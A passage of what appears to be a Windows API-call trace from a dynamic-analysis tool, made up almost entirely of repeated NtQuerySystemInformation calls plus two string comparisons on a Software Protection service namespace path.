(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0277.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0277.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0277.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd7a0, Length=0x28, ResultLength=0x0) [0277.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0277.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd820, Length=0x28, ResultLength=0x0) [0277.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd820, Length=0x28, ResultLength=0x0) [0277.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0277.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x20, ResultLength=0x0) [0277.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0277.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0277.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0277.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0277.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x20, ResultLength=0x0) [0277.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd710, Length=0x20, ResultLength=0x0) [0277.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd710, Length=0x20, ResultLength=0x0) [0277.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0277.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0277.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0277.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0277.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0277.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0277.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0277.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0277.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0277.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0277.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd730, Length=0x28, ResultLength=0x0) [0277.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd7a0, Length=0x28, ResultLength=0x0) [0277.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0277.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd820, Length=0x28, ResultLength=0x0) [0277.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd820, Length=0x28, ResultLength=0x0) [0277.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0277.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x20, ResultLength=0x0) [0277.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0277.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0277.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0277.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0277.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x20, ResultLength=0x0) [0277.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd710, Length=0x20, ResultLength=0x0) [0277.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd710, Length=0x20, ResultLength=0x0) [0277.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0277.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb10, Length=0x28, ResultLength=0x0) [0277.264] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0277.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0277.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0277.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0277.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0277.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0277.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0277.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0277.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd960, Length=0x28, ResultLength=0x0) [0277.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0277.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9e0, Length=0x28, ResultLength=0x0) [0277.274] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9e0, Length=0x28, ResultLength=0x0) [0277.275] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0277.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd940, Length=0x20, ResultLength=0x0) [0277.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0277.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0277.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0277.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0277.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd940, Length=0x20, ResultLength=0x0) [0277.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8d0, Length=0x20, ResultLength=0x0) [0277.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8d0, Length=0x20, ResultLength=0x0) [0277.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0277.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb10, Length=0x28, ResultLength=0x0) [0277.279] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0277.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0277.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0277.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0277.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0277.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0277.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0277.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0277.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd960, Length=0x28, ResultLength=0x0) [0277.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0277.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9e0, Length=0x28, ResultLength=0x0) [0277.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9e0, Length=0x28, ResultLength=0x0) [0277.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0277.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd940, Length=0x20, ResultLength=0x0) [0277.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0277.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0277.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0277.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0277.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd940, Length=0x20, ResultLength=0x0) [0277.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8d0, Length=0x20, ResultLength=0x0) [0277.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8d0, Length=0x20, ResultLength=0x0) [0277.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd890, Length=0x50, ResultLength=0x0) [0277.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.292] NtQuerySystemInformation 